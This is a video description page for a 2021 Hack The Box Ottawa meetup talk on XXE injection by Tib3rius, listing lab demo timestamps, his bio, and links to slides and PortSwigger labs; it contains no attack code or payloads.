XXE INJECTION Deep Dive by @0xTib3rius
▬▬▬▬▬▬ Abstract & Bio 📝 ▬▬▬▬▬▬
In this session, Tib3rius performs a deep dive into the crazy web app vulnerability that is XML External Entity (XXE) Injection, explaining how and why it works, with live demos of several Portswigger Web Academy labs.
At the end of the session, he does a walkthrough of the Aragog HTB box, which uses XXE as part of its initial exploit vector.
Tib3rius (tib3rius.com)
Twitter: / 0xtib3rius
Hacker @WhiteOakSec | AutoRecon Dev | YouTube: http://is.gd/0o0GDW |
Twitch: http://is.gd/aPafUV | Udemy: http://is.gd/Nhceps | Discord: http://is.gd/5wdfRz (he/him)
Tib3rius is a penetration tester with over 10 years of experience testing and breaking web applications. Late in his career, he decided to pursue the OSCP certification, and in the process helped build an online community in the InfoSec Prep Discord server, wrote a popular OSCP tool called AutoRecon, and helped thousands of students learn Privilege Escalation through his two Udemy courses. In his spare time, he enjoys gaming with friends and binging as many TV shows as he can.
▬▬▬▬▬▬ T I M E S T A M P S ⏰ ▬▬▬▬▬▬
00:00:35 Introduction of our guest Tib3rius by Rana Khalil
00:01:50 Tib3rius' intro
00:04:20 Lab 1: Exploiting XXE using external entities to retrieve files
00:18:16 Lab 2: Exploiting blind XXE to exfiltrate data using a malicious external DTD
00:30:14 Lab 3: Exploiting blind XXE to retrieve data via error messages
00:38:26 Lab 4: ARAGOG (user flag)
▬▬▬▬▬▬ Useful Links 🛠 ▬▬▬▬▬▬
Slides
tib3rius.com/docs/XXE.pdf
Web Security Academy
https://portswigger.net/web-security (Sign Up)
Web Security Academy Labs
https://portswigger.net/web-security/...
https://portswigger.net/web-security/...
https://portswigger.net/web-security/...
Burp Community Edition
https://portswigger.net/burp/communit...
▬▬▬▬▬▬ Hack The Box Ottawa 🛠 ▬▬▬▬▬▬
Meetup.com: https://www.meetup.com/Hack-The-Box-M...
Twitter: / hackthebox_yow
Смотрите видео XXE INJECTION Deep Dive by @0xTib3rius онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь Hack The Box Ottawa - Meetup 27 Март 2021, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 3,695 раз и оно понравилось 142 людям.